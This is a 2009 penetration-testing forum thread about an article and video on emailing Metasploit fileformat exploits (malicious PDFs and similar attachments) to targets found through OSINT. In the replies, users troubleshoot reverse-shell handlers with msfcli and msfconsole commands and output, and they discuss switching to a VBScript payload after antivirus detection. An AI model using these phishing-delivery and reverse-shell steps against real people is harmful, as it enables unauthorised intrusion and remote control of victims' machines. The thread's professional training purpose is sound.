[Article]-Video: Client-Sides, Social Engineering and Metasploit, Oh My!


don

Administrator

Posts: 4226

Joined: Sun Aug 28, 2005 10:47 pm

Location: Chicago

Post Mon Feb 02, 2009 6:30 pm

[Article]-Video: Client-Sides, Social Engineering and Metasploit, Oh My!

More hacking goodness from Mr. Gates!!

Permanent link: [Article]-Video: Client-Side, Social Engineering and Metasploit, Oh My!


By Chris Gates, CISSP, GCIH, C|EH, CPTS

It should be obvious to everyone that the bad guys are moving away from network-level attacks and moving toward social engineering coupled with client-side attacks. In fact, this is the focus of the next ChicagoCon in May, where I will be presenting this exact topic live. Penetration testers need to be able to help an organization detect and respond to client-side attacks, and what better way to do that than to do a little client-side exploitation during your pentests?

A new mixin has been added to the Metasploit Framework that allows the penetration tester to create and output the files that contain the exploit code instead of just serving up the exploit on a web page. This increases the attack surface by allowing the pentester to perform their Open Source Intelligence (OSINT) gathering to collect email addresses for the target domain. We then take those addresses and actually send the exploit to the victim as an attachment in the email versus a link to a website. Your mileage may vary on the effectiveness of that technique, but in my experience people seem to be more apt to open attachments of a "normal" or "non-malicious" type like .pdf and .html rather than clicking on links. Some example formats that can be used with the fileformat mixin are .pdf, .html, .cab, .m3u, .xpm, as well as others.

**This isn't to say that some fileformat exploits can't be delivered via the web.  You can easily link to www.evil.com/evil.pdf, but some lend themselves to easier exploitation if you can get the file into a user's inbox. So let's take a quick look at how this can be accomplished.



Don
Last edited by don on Wed Feb 04, 2009 12:38 pm, edited 1 time in total.
CISSP, MCSE, CSTA, Security+ SME

apollo

Full Member

Posts: 146

Joined: Fri Apr 04, 2008 7:44 pm

Post Mon Feb 02, 2009 9:36 pm

Re: [Article]-Video: Client-Side, Social Engineering and Metasploit, Oh My!

Great examples and video :)  I was playing with this stuff the other day with the office macros in Metasploit.  It seemed to be quite effective.  It's amazing what folks will click on with a good backstory.
CISSP, CSSLP, MCSE+Security, MCTS, CCSP, GPEN, GWAPT, GCWN, NOP, OSCP, Security+

RoleReversal

Hero Member

Posts: 928

Joined: Fri Jan 04, 2008 8:54 am

Location: UK

Post Tue Feb 03, 2009 9:55 am

Re: [Article]-Video: Client-Side, Social Engineering and Metasploit, Oh My!

Nice work Chris, thanks :D

(looks like the vimeo link has gone walkies though...)

KrisTeason

Hero Member

Posts: 515

Joined: Sat Sep 08, 2007 7:48 pm

Location: /dev/null

Post Tue Feb 03, 2009 3:23 pm

Re: [Article]-Video: Client-Side, Social Engineering and Metasploit, Oh My!

Like your other videos as well as this one, I've got to say nice work. It's a good thing Metasploit has broadened its horizons and incorporated the use of fileformat exploits. I'd sure like your trunk, by the way: 327 exploits, and I only have 288 (I think...).
eCPPT (Silver/Gold), eWPT, GSEC, GISP, GCIH, OSCP, OSWP

LSOChris

Post Tue Feb 03, 2009 3:55 pm

Re: [Article]-Video: Client-Side, Social Engineering and Metasploit, Oh My!

Thanks guys!

I'll be releasing a few more client-side/fileformat videos in March as part of my client-side talk at SOURCE Boston. I'll make sure I post on EH.net when I do.

mtgarden

Newbie

Posts: 14

Joined: Mon Feb 26, 2007 3:22 pm

Post Wed Feb 11, 2009 12:42 pm

Question: I would like to use this in a demonstration next week

Is it possible for metasploit to tie this to a current PDF?  In other words, can I use a pdf I have and add this exploit onto it?  At least, where would I start looking for that information?

KrisTeason

Hero Member

Posts: 515

Joined: Sat Sep 08, 2007 7:48 pm

Location: /dev/null

Post Wed Feb 11, 2009 12:59 pm

Re: [Article]-Video: Client-Sides, Social Engineering and Metasploit, Oh My!

You mean like binding the PDF with an existing PDF? I'm thinking that you can, but what would be the point, once the malicious pdf opens, doesn't it just freeze up anyway?
eCPPT (Silver/Gold), eWPT, GSEC, GISP, GCIH, OSCP, OSWP

mtgarden

Newbie

Posts: 14

Joined: Mon Feb 26, 2007 3:22 pm

Post Wed Feb 11, 2009 1:00 pm

Re: [Article]-Video: Client-Sides, Social Engineering and Metasploit, Oh My!

Not sure.  Was in the process of setting up a test environment to explore this threat vector.

LSOChris

Post Wed Feb 11, 2009 3:10 pm

Re: Question: I would like to use this in a demonstration next week

mtgarden wrote: Is it possible for metasploit to tie this to a current PDF? In other words, can I use a pdf I have and add this exploit onto it? At least, where would I start looking for that information?

Not currently, that I am aware of.
Last edited by LSOChris on Thu Feb 12, 2009 10:43 am, edited 1 time in total.

mtgarden

Newbie

Posts: 14

Joined: Mon Feb 26, 2007 3:22 pm

Post Wed Feb 11, 2009 3:47 pm

Re: [Article]-Video: Client-Sides, Social Engineering and Metasploit, Oh My!

Thanks. I was testing this for a presentation, but Symantec actually catches it. So I am trying the VBScript attack.

Sadly, there is a quirk with either Metasploit or BT3.  Not sure which yet.  When I run the /msfcli multi/handler PAYLOAD=<payload> LHOST=<IP> etc..., it runs the exploit and binds to IP=0.0.0.0 which is less than helpful. 

Heh, I guess there was no reason to assume this would be that easy.  ;D

dean

Post Wed Feb 11, 2009 4:08 pm

Re: [Article]-Video: Client-Sides, Social Engineering and Metasploit, Oh My!

Make sure that the IP you're listening on is the one you add as LHOST and is actually active.

For example:

msf exploit(handler) > set LHOST 192.168.1.1
LHOST => 192.168.1.1
msf exploit(handler) > exploit

[*] Handler binding to LHOST 192.168.1.1
[-] Bind failed on 192.168.1.1
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
^C[-] Exploit failed:
[*] Exploit completed, but no session was created.
msf exploit(handler) > set LHOST 10.10.10.15
LHOST => 10.10.10.15
msf exploit(handler) > exploit

[*] Handler binding to LHOST 10.10.10.15
[*] Started reverse handler
[*] Starting the payload handler...

tested with 3.3-dev
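The fallback that dean's session shows, reproduced as an added example (this is not code from the thread or from Metasploit): a small Python check that tries to bind a TCP listener to the requested LHOST and only then falls back to 0.0.0.0, which is why an LHOST that is not configured on any local interface ends up as an all-interfaces bind. The loopback address and the TEST-NET address 192.0.2.1 are constructed inputs, and the function names are my own.

```python
import errno
import socket

# Constructed inputs for the demonstration. Loopback is configured on
# practically every host; 192.0.2.1 is from the TEST-NET-1 documentation
# range and is assumed NOT to be assigned to any local interface.
LOCAL_ADDR = "127.0.0.1"
FOREIGN_ADDR = "192.0.2.1"


def try_bind(lhost, lport=0):
    """Attempt a TCP bind to (lhost, lport).

    Returns (bound_address, None) on success or (None, errno_name) on failure.
    lport=0 lets the OS pick a free port, so the check leaves nothing listening.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    try:
        sock.bind((lhost, lport))
        return sock.getsockname()[0], None
    except OSError as exc:
        # An address that is not on any interface fails with EADDRNOTAVAIL;
        # a port already in use would fail with EADDRINUSE instead.
        return None, errno.errorcode.get(exc.errno, str(exc.errno))
    finally:
        sock.close()


def handler_bind(lhost, lport=0):
    """Mimic the handler behaviour in the output above: try LHOST first,
    then fall back to 0.0.0.0 (all interfaces) if that bind fails.

    Returns (address actually bound, error from the first attempt or None).
    """
    addr, first_err = try_bind(lhost, lport)
    if addr is not None:
        return addr, None
    print(f"[-] Bind failed on {lhost} ({first_err})")
    print("[*] Handler binding to LHOST 0.0.0.0")
    addr, _ = try_bind("0.0.0.0", lport)
    return addr, first_err


if __name__ == "__main__":
    for host in (LOCAL_ADDR, FOREIGN_ADDR):
        bound, err = handler_bind(host)
        print(f"LHOST {host}: bound to {bound}, first attempt error: {err}")
```

If the address you set as LHOST comes back with EADDRNOTAVAIL here, the handler will silently listen on every interface, and a reverse payload pointed at that LHOST will never reach a box that does not actually hold the address.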

mtgarden

Newbie

Posts: 14

Joined: Mon Feb 26, 2007 3:22 pm

Post Wed Feb 11, 2009 4:24 pm

Re: [Article]-Video: Client-Sides, Social Engineering and Metasploit, Oh My!

Well, my VM has an IP of 192.168.1.1.  So I added LHOST=192.168.1.1 to the exploit.

Then when running ./msfcli multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.1.1 DisableCourtesyShell=True E

It doesn't give me a "bind failed" error, it just binds to 0.0.0.0.

This happens in a BT3 VM and on a BT3 laptop install.  Would I look for the error/problem in BT3 or in Metasploit 3.2?

KrisTeason

Hero Member

Posts: 515

Joined: Sat Sep 08, 2007 7:48 pm

Location: /dev/null

Post Wed Feb 11, 2009 4:55 pm

Re: [Article]-Video: Client-Sides, Social Engineering and Metasploit, Oh My!

Mine also binds to 0.0.0.0, but here is what happened when I tested this out. I created a malicious .exe using msfpayload. This was going to be a reverse meterpreter .exe that would shovel back a shell to a port on my box. So I set my LHOST similar to you when using exploit/multi/multi_handler and keyed exploit in my msfconsole; it said 0.0.0.0, however once I executed my .exe I received my reverse shell.
eCPPT (Silver/Gold), eWPT, GSEC, GISP, GCIH, OSCP, OSWP

mtgarden

Newbie

Posts: 14

Joined: Mon Feb 26, 2007 3:22 pm

Post Thu Feb 12, 2009 7:56 am

Re: [Article]-Video: Client-Sides, Social Engineering and Metasploit, Oh My!

OK.  Then the problem lies in my malicious VB script.  Will have to figure out how to fix that one.

Thanks.

don

Administrator

Posts: 4226

Joined: Sun Aug 28, 2005 10:47 pm

Location: Chicago

Post Tue Feb 17, 2009 1:28 pm

Re: [Article]-Video: Client-Sides, Social Engineering and Metasploit, Oh My!

Submitted to digg. Click the link below and vote:

http://digg.com/security/Video_Client_S ... loit_Oh_My

Please help spread the word,
Don
CISSP, MCSE, CSTA, Security+ SME